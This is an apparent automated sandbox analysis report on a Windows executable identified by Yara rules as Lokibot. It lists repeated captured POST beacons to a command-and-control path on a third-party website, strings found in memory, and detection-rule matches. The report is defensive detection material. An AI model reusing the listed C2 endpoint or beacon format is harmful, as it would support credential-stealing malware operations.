                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 5_2_00404ED4 recv,5_2_00404ED4
                  Source: unknownDNS traffic detected: queries for: www.ritcophysiotherapy.com.au
                  Source: unknownHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 190Connection: close
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 22 Feb 2021 18:13:02 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.2.34Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000003.638473832.0000000005B8D000.00000004.00000001.sdmpString found in binary or memory: http://www.ascendercorp.com/typedesigners.html
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000003.650636211.0000000005B50000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.coma
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000003.650636211.0000000005B50000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comionF
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000003.650636211.0000000005B50000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.commi
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000003.635133696.0000000005B6B000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000003.635133696.0000000005B6B000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.comc
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000003.636344129.0000000005B57000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000003.636630818.0000000005B56000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000003.636508473.0000000005B58000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/;
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000003.636508473.0000000005B58000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn9
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000003.636140982.0000000005B5E000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnFk
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000003.636508473.0000000005B58000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnO
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000003.636344129.0000000005B57000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cng
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000003.650636211.0000000005B50000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm-
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                  Source: Conan Fegan - Aluminium.exe, Conan Fegan - Aluminium.exe, 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.ibsensoftware.com/
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000003.634766145.0000000005B53000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000003.634766145.0000000005B53000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.coma
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.651436438.0000000002D01000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
                  Source: Conan Fegan - Aluminium.exe, 00000005.00000002.900851249.000000000049F000.00000040.00000001.sdmpString found in binary or memory: https://www.ritcophysiotherapy.com.au/wap121/five/fre.php

                  System Summary:

                  barindex
                  Malicious sample detected (through community Yara rule)Show sources
                  Source: 00000000.00000002.651632346.0000000003D09000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                  Source: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 00000000.00000002.651436438.0000000002D01000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 0.2.Conan Fegan - Aluminium.exe.3e3d4e0.2.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                  Source: 0.2.Conan Fegan - Aluminium.exe.3e3d4e0.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 0.2.Conan Fegan - Aluminium.exe.3eccf90.3.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                  Source: 0.2.Conan Fegan - Aluminium.exe.3eccf90.3.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 5.2.Conan Fegan - Aluminium.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                  Source: 5.2.Conan Fegan - Aluminium.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 5.2.Conan Fegan - Aluminium.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                  Source: 5.2.Conan Fegan - Aluminium.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 0.2.Conan Fegan - Aluminium.exe.3eccf90.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                  Source: 0.2.Conan Fegan - Aluminium.exe.3eccf90.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 0.2.Conan Fegan - Aluminium.exe.2d63264.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                  Source: 0.2.Conan Fegan - Aluminium.exe.2d63264.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 0.2.Conan Fegan - Aluminium.exe.3dfbac0.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                  Source: 0.2.Conan Fegan - Aluminium.exe.3dfbac0.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  .NET source code contains very large stringsShow sources
                  Source: Conan Fegan - Aluminium.exe, frmlogin.csLong String: Length: 13656
                  Source: 0.2.Conan Fegan - Aluminium.exe.960000.0.unpack, frmlogin.csLong String: Length: 13656
                  Source: 0.0.Conan Fegan - Aluminium.exe.960000.0.unpack, frmlogin.csLong String: Length: 13656
                  Source: 5.2.Conan Fegan - Aluminium.exe.c20000.1.unpack, frmlogin.csLong String: Length: 13656
                  Source: 5.0.Conan Fegan - Aluminium.exe.c20000.0.unpack, frmlogin.csLong String: Length: 13656
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 0_2_009695260_2_00969526
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 0_2_0096B3F40_2_0096B3F4
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 0_2_0096A47C0_2_0096A47C
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 0_2_07A38DF80_2_07A38DF8
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 0_2_07A300400_2_07A30040
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 0_2_07A30D800_2_07A30D80
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 0_2_07A38DEA0_2_07A38DEA
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 0_2_07A3C5FF0_2_07A3C5FF
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 0_2_07A384170_2_07A38417
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 0_2_07A32BC70_2_07A32BC7
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 0_2_07A32BD80_2_07A32BD8
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 0_2_07A341900_2_07A34190
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 5_2_0040549C5_2_0040549C
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 5_2_004029D45_2_004029D4
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 5_2_00C2A47C5_2_00C2A47C
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 5_2_00C295265_2_00C29526
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 5_2_00C2B3F45_2_00C2B3F4
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: String function: 0041219C appears 45 times
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: String function: 00405B6F appears 42 times
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.654833481.00000000077B0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs Conan Fegan - Aluminium.exe
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.654938639.00000000079A0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameLegacyPathHandling.dllN vs Conan Fegan - Aluminium.exe
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.650852695.00000000009C4000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCallConvCdecl.exe4 vs Conan Fegan - Aluminium.exe
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.651436438.0000000002D01000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAsyncState.dllF vs Conan Fegan - Aluminium.exe
                  Source: Conan Fegan - Aluminium.exe, 00000005.00000002.900934959.0000000000C84000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCallConvCdecl.exe4 vs Conan Fegan - Aluminium.exe
                  Source: Conan Fegan - Aluminium.exeBinary or memory string: OriginalFilenameCallConvCdecl.exe4 vs Conan Fegan - Aluminium.exe
                  Source: Conan Fegan - Aluminium.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                  Source: 00000000.00000002.651632346.0000000003D09000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                  Source: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 00000000.00000002.651436438.0000000002D01000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 0.2.Conan Fegan - Aluminium.exe.3e3d4e0.2.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                  Source: 0.2.Conan Fegan - Aluminium.exe.3e3d4e0.2.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 0.2.Conan Fegan - Aluminium.exe.3eccf90.3.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                  Source: 0.2.Conan Fegan - Aluminium.exe.3eccf90.3.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 5.2.Conan Fegan - Aluminium.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                  Source: 5.2.Conan Fegan - Aluminium.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 5.2.Conan Fegan - Aluminium.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                  Source: 5.2.Conan Fegan - Aluminium.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 0.2.Conan Fegan - Aluminium.exe.3eccf90.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                  Source: 0.2.Conan Fegan - Aluminium.exe.3eccf90.3.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 0.2.Conan Fegan - Aluminium.exe.2d63264.1.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
                  Source: 0.2.Conan Fegan - Aluminium.exe.2d63264.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                  Source: 0.2.Conan Fegan - Aluminium.exe.2d63264.1.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 0.2.Conan Fegan - Aluminium.exe.3dfbac0.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                  Source: 0.2.Conan Fegan - Aluminium.exe.3dfbac0.4.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: Conan Fegan - Aluminium.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  Source: Conan Fegan - Aluminium.exe, frmlogin.csBase64 encoded string: 